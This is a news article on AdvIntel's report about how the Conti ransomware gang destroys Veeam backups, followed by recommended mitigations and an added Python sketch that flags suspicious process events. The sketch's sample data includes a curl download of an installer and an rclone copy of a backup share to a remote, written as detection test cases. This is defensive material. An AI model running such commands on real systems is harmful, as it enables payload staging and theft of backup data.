Conti Ransomware Expands Ability to Blow Up Backups

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: Hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish that seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data is only a secondary motivator for paying up – most particularly if those victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: A legitimate, commercially available tool originally designed for network-penetration testers. Its usage by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: The remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

093021 18:58 UPDATE: Rick Vanover, senior director of product strategy for Veeam, provided the following statement to Threatpost:

“There are more options than ever to keep Veeam backup data safe from ransomware. Immutable backup copies on-premises, in the cloud, storage system or unique service provider offerings, or even a combination of these. Veeam has capabilities to drive the highest confidence in data recovery.” —Veeam’s Rick Vanover.

Veeam provides numerous resources on setting up immutable backup and data replication, including this one.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent the attack initiations, employee training and email security protocols should be implemented. Conti uses very developed social-engineering techniques in order to convince the victim employees that the targeted emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from the C:\ProgramData and C:\Temp directories.
    5. Rclone and other data-exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.
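
Recommendations 4 and 5 can be turned into a triage pass over process-creation logs. The sketch below is an added example, not code from AdvIntel or Threatpost. It assumes events shaped like Sysmon process-creation records with `Image` and `CommandLine` fields; the tag names, the remote name `remote1` and the sample events are constructed for illustration.

```python
import ntpath
import re

# Directories called out in recommendation 4.
WATCHED_DIRS = ("c:\\programdata\\", "c:\\temp\\")
RCLONE_VERBS = {"copy", "sync", "move"}            # rclone transfer subcommands
REMOTE_ARG = re.compile(r"[a-z0-9_-]{2,}:[^\\]*")  # "remote:path"; a drive letter is one char

def classify(event):
    """Return review tags for one process-creation event (dict with Image, CommandLine)."""
    exe = ntpath.basename(event["Image"]).lower()
    args = event["CommandLine"].lower().split()[1:]
    tags = []
    # Recommendation 5: rclone by file name, or by command-line shape if the name differs.
    remote = any(REMOTE_ARG.fullmatch(a) and "//" not in a for a in args)
    if exe == "rclone.exe" or (remote and RCLONE_VERBS & set(args)):
        tags.append("rclone-transfer")
    # Recommendation 4: curl invocations and .msi packages under the watched directories.
    if exe == "curl.exe":
        tags.append("curl")
    if any(a.endswith(".msi") and a.startswith(WATCHED_DIRS) for a in args):
        tags.append("msi-from-watched-dir")
    return tags

# Constructed sample events (not taken from the AdvIntel report).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\setup.msi /qn"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Temp\agent.msi https://example.invalid/agent.msi"},
    {"Image": r"C:\Temp\rclone.exe",
     "CommandLine": r"rclone.exe copy \\backup01\veeam remote1:archive"},
    {"Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy.exe D:\data E:\mirror /MIR"},
]

def triage(events):
    """Keep only events that received at least one tag."""
    tagged = ((e["CommandLine"], classify(e)) for e in events)
    return [(cmd, tags) for cmd, tags in tagged if tags]

if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE_EVENTS):
        print(tags, cmd)
```

None of this works unless command-line auditing is enabled on the endpoints, which is the precondition recommendation 5 names.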
